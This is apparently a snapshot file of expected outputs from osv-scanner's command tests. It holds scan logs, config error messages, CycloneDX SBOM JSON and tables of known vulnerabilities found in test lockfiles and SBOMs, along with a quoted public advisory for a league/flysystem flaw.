https://chromium.googlesource.com/chromium/src | | testdata/locks-insecure/osv-scanner-flutter-deps.json | | UNKNOWN | | https://github.com/brendan-duncan/archive.git | | testdata/locks-insecure/osv-scanner-flutter-deps.json | | UNKNOWN | | https://github.com/flutter/buildroot.git | | testdata/locks-insecure/osv-scanner-flutter-deps.json | | 0BSD | Packagist | drupal/core | 10.4.5 | testdata/locks-many-with-insecure/composer.lock | | 0BSD | Packagist | drupal/simple_sitemap | 4.2.1 | testdata/locks-many-with-insecure/composer.lock | | 0BSD | Packagist | drupal/tfa | 2.0.0-alpha4 | testdata/locks-many-with-insecure/composer.lock | | 0BSD | Packagist | league/flysystem | 1.0.8 | testdata/locks-many-with-insecure/composer.lock | | 0BSD | Packagist | sentry/sdk | 2.0.4 | testdata/locks-many-with-insecure/composer.lock | | 0BSD | Packagist | theseer/tokenizer | 1.1.3 | testdata/locks-many-with-insecure/composer.lock | +-------------------+-----------+------------------------------------------------+--------------+-------------------------------------------------------+ --- [TestCommand/config_file_can_be_broad - 2] --- [TestCommand/config_file_is_invalid - 1] Scanning dir ./testdata/config-invalid Scanned /testdata/config-invalid/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestCommand/config_file_is_invalid - 2] Ignored invalid config file at /testdata/config-invalid/osv-scanner-test.toml because: toml: line 1: expected '.' or '=', but got '!' instead --- [TestCommand/config_files_cannot_have_unknown_keys - 1] --- [TestCommand/config_files_cannot_have_unknown_keys - 2] Failed to read config file: unknown keys in config file: RustVersionOverride, PackageOverrides.skip, PackageOverrides.license.skip unknown keys in config file: RustVersionOverride, PackageOverrides.skip, PackageOverrides.license.skip --- [TestCommand/config_files_should_not_have_multiple_ignores_with_the_same_id - 1] warning: ./testdata/osv-scanner-duplicate-config.toml has multiple ignores for GO-2022-0274 - only the first will be used! Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. ./testdata/osv-scanner-duplicate-config.toml has unused ignores: - GO-2022-0274 - GO-2022-0274 - GHSA-whgm-jr23-g3j9 - CVE-2025-26519 No issues found --- [TestCommand/config_files_should_not_have_multiple_ignores_with_the_same_id - 2] --- [TestCommand/cyclonedx_1.4_output - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:composer/league/flysystem@1.0.8", "type": "library", "name": "league/flysystem", "version": "1.0.8", "licenses": [], "purl": "pkg:composer/league/flysystem@1.0.8" }, { "bom-ref": "pkg:golang/stdlib@1.99.9", "type": "library", "name": "stdlib", "version": "1.99.9", "licenses": [], "purl": "pkg:golang/stdlib@1.99.9" }, { "bom-ref": "pkg:golang/toolchain@1.99.9", "type": "library", "name": "toolchain", "version": "1.99.9", "licenses": [], "purl": "pkg:golang/toolchain@1.99.9" }, { "bom-ref": "pkg:npm/has-flag@4.0.0", "type": "library", "name": "has-flag", "version": "4.0.0", "licenses": [], "purl": "pkg:npm/has-flag@4.0.0" }, { "bom-ref": "pkg:npm/wrappy@1.0.2", "type": "library", "name": "wrappy", "version": "1.0.2", "licenses": [], "purl": "pkg:npm/wrappy@1.0.2" } ], "vulnerabilities": [ { "id": "GHSA-9f46-5r25-5wfm", "references": [ { "id": "CVE-2021-32708", "source": {} } ], "ratings": [ { "method": "CVSSv3", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "description": "Time-of-check Time-of-use (TOCTOU) Race Condition in league/flysystem", "detail": "### Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions: \n\n- A user is allowed to supply the path or filename of an uploaded file.\n- The supplied path or filename is not checked against unicode chars.\n- The supplied pathname checked against an extension deny-list, not an allow-list.\n- The supplied path or filename contains a unicode whitespace char in the extension.\n- The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.\n\n### Patches\n\nThe unicode whitespace removal has been replaced with a rejection (exception).\n\nThe library has been patched in:\n- 1.x: https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32\n- 2.x: https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74\n\n### Workarounds\n\nFor 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.\n", "advisories": [ { "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32708" } ], "published": "2021-06-29T03:13:28Z", "updated": "2026-03-13T22:01:08Z", "credits": { "organizations": [] }, "affects": [ { "ref": "pkg:composer/league/flysystem" } ] } ] } --- [TestCommand/cyclonedx_1.4_output - 2] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand/cyclonedx_1.5_output - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/league/flysystem@1.0.8", "type": "library", "name": "league/flysystem", "version": "1.0.8", "licenses": [], "purl": "pkg:composer/league/flysystem@1.0.8" }, { "bom-ref": "pkg:golang/stdlib@1.99.9", "type": "library", "name": "stdlib", "version": "1.99.9", "licenses": [], "purl": "pkg:golang/stdlib@1.99.9" }, { "bom-ref": "pkg:golang/toolchain@1.99.9", "type": "library", "name": "toolchain", "version": "1.99.9", "licenses": [], "purl": "pkg:golang/toolchain@1.99.9" }, { "bom-ref": "pkg:npm/has-flag@4.0.0", "type": "library", "name": "has-flag", "version": "4.0.0", "licenses": [], "purl": "pkg:npm/has-flag@4.0.0" }, { "bom-ref": "pkg:npm/wrappy@1.0.2", "type": "library", "name": "wrappy", "version": "1.0.2", "licenses": [], "purl": "pkg:npm/wrappy@1.0.2" } ], "vulnerabilities": [ { "id": "GHSA-9f46-5r25-5wfm", "references": [ { "id": "CVE-2021-32708", "source": {} } ], "ratings": [ { "method": "CVSSv3", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "description": "Time-of-check Time-of-use (TOCTOU) Race Condition in league/flysystem", "detail": "### Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions: \n\n- A user is allowed to supply the path or filename of an uploaded file.\n- The supplied path or filename is not checked against unicode chars.\n- The supplied pathname checked against an extension deny-list, not an allow-list.\n- The supplied path or filename contains a unicode whitespace char in the extension.\n- The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.\n\n### Patches\n\nThe unicode whitespace removal has been replaced with a rejection (exception).\n\nThe library has been patched in:\n- 1.x: https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32\n- 2.x: https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74\n\n### Workarounds\n\nFor 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.\n", "advisories": [ { "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32708" } ], "published": "2021-06-29T03:13:28Z", "updated": "2026-03-13T22:01:08Z", "credits": { "organizations": [] }, "affects": [ { "ref": "pkg:composer/league/flysystem" } ] } ] } --- [TestCommand/cyclonedx_1.5_output - 2] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand/exclude_with_exact_directory_name - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/exclude_with_exact_directory_name - 2] --- [TestCommand/exclude_with_glob_pattern - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/exclude_with_glob_pattern - 2] --- [TestCommand/exclude_with_invalid_regex_returns_error - 1] Scanning dir ./testdata/locks-many --- [TestCommand/exclude_with_invalid_regex_returns_error - 2] failed to parse exclude patterns: invalid regex pattern "[invalid": error parsing regexp: missing closing ]: `[invalid` --- [TestCommand/exclude_with_multiple_exact_directories - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/exclude_with_multiple_exact_directories - 2] --- [TestCommand/exclude_with_multiple_pattern_types - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/exclude_with_multiple_pattern_types - 2] --- [TestCommand/exclude_with_regex_pattern - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/exclude_with_regex_pattern - 2] --- [TestCommand/folder_of_supported_sbom_with_only_unimportant - 1] Scanning dir ./testdata/sbom-insecure/only-unimportant.spdx.json Scanned /testdata/sbom-insecure/only-unimportant.spdx.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestCommand/folder_of_supported_sbom_with_only_unimportant - 2] --- [TestCommand/folder_of_supported_sbom_with_only_unimportant#01 - 1] Scanning dir ./testdata/sbom-insecure/only-unimportant.spdx.json Scanned /testdata/sbom-insecure/only-unimportant.spdx.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------+------+-----------+---------+--------------------+---------------+---------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+--------------------+---------------+---------------------------------------------------+ | Unimportant vulnerabilities | | | | | | | +---------------------------------------+------+-----------+---------+--------------------+---------------+---------------------------------------------------+ | https://osv.dev/UBUNTU-CVE-2017-11164 | 7.5 | Ubuntu | pcre3 | 2:8.39-12ubuntu0.1 | -- | testdata/sbom-insecure/only-unimportant.spdx.json | +---------------------------------------+------+-----------+---------+--------------------+---------------+---------------------------------------------------+ --- [TestCommand/folder_of_supported_sbom_with_only_unimportant#01 - 2] --- [TestCommand/folder_of_supported_sbom_with_vulns - 1] Scanning dir ./testdata/sbom-insecure/ Scanned /testdata/sbom-insecure/alpine-zlib-16.cdx.json file and found 1 package Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/sbom-insecure/bad-purls.cdx.xml file and found 15 packages Scanned /testdata/sbom-insecure/only-unimportant.spdx.json file and found 1 package Scanned /testdata/sbom-insecure/postgres-stretch.cdx.xml file and found 136 packages Scanned /testdata/sbom-insecure/with-duplicates.cdx.xml file and found 17 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 10 local/unscannable package/s from the scan. Total 26 packages affected by 181 known vulnerabilities (21 Critical, 77 High, 56 Medium, 3 Low, 24 Unknown) from 4 ecosystems. 11 vulnerabilities can be fixed. +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ | https://osv.dev/GO-2022-0274 | 6.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.0 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-v95c-p5hm-xq8f | | | | | | | | https://osv.dev/GO-2022-0452 | 5.9 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.2 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-f3fp-gc8g-vw66 | | | | | | | | https://osv.dev/GO-2023-1627 | 7.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-vpvm-3wq2-2wvm | | | | | | | | https://osv.dev/GO-2023-1682 | 2.5 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-m8cg-xc2p-r3fc | | | | | | | | https://osv.dev/GO-2023-1683 | 6.1 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-g2j6-57v7-gm8c | | | | | | | | https://osv.dev/GO-2024-2491 | 8.6 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.12 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-xr7r-f8xq-vfvv | | | | | | | | https://osv.dev/GO-2024-3110 | 4.8 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.14 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-jfvp-7x6p-h2pv | | | | | | | | https://osv.dev/GO-2025-4096 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-9493-h29p-rfm2 | | | | | | | | https://osv.dev/GO-2025-4097 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-qw9x-cqr3-wc7r | | | | | | | | https://osv.dev/GO-2025-4098 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-cgrx-mc8f-2prm | | | | | | | | https://osv.dev/GO-2022-0493 | 5.3 | Go | golang.org/x/sys | v0.0.0-20210817142637-7d9622a276b7 | 0.0.0-20220412211240-33da011f77ad | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-p782-xgp4-8hr8 | | | | | | | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/DSA-4685-1 | 5.5 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4808-1 | 5.7 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0501 | 5.9 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-3462 | 8.1 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3715 | 7.8 | Debian | bash | 4.4-5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2781 | 6.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0684 | 5.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3482-1 | | Debian | debian-archive-keyring | 2017.5+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5147-1 | 9.8 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-6297 | 8.2 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2219 | 7.5 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4535-1 | 7.5 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-5188 | 6.7 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-1304 | 7.8 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3910-1 | | | | | | | | https://osv.dev/DSA-5122-1 | 8.8 | Debian | gzip | 1.6-5+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0379 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7526 | 6.8 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0495 | 4.7 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-13627 | 6.3 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-33560 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-40528 | 5.9 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5863-1 | 5.3 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-10790 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6003 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-46848 | 9.1 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3263-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2025-13151 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5142-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5271-1 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5391-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5990-1 | | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-3709 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2309 | | | | | | | | https://osv.dev/DLA-3878-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2016-9318 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0663 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-15412 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16931 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16932 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-18258 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5130 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5969 | 4.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7375 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7376 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-8872 | 9.1 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9047 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9048 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9049 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9050 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14404 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14567 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-19956 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-20388 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-7595 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3516 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3517 | 8.6 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3518 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3537 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3541 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-23308 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9714 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4319-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2026-0989 | 3.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0990 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0992 | 2.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-1 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 